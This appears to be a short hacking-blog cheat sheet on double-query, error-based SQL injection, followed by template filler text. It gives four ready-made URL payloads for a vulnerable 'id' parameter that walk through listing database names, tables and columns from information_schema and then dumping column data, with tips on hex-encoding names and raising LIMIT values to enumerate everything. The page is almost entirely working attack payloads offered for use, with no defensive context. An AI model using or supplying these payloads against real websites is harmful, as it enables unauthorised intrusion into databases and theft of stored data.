Double Queary SQL Injection ~ L337 X

Double Query Sql Injection Code...

Finding Out Database :

www.example.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Finding Out Tables :

whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Replace Hex of 0xHEX with database hex code.
** increase 1st limit to show all tables.

Finding Out column :

www.example.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xHEXDATABASE AND table_name=0xHEXTABLENAME LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Replace HEXDATABASE of 0xHEXDATABASE & HEXTABLENAME of 0xHEXTABLENAME with hex code.

** increase the 1st limit to get all column name.

Now use the following code to Dump All Column Data :

www.example.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

About Admin

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

L337 X

Double Queary SQL Injection

About Admin

Related Post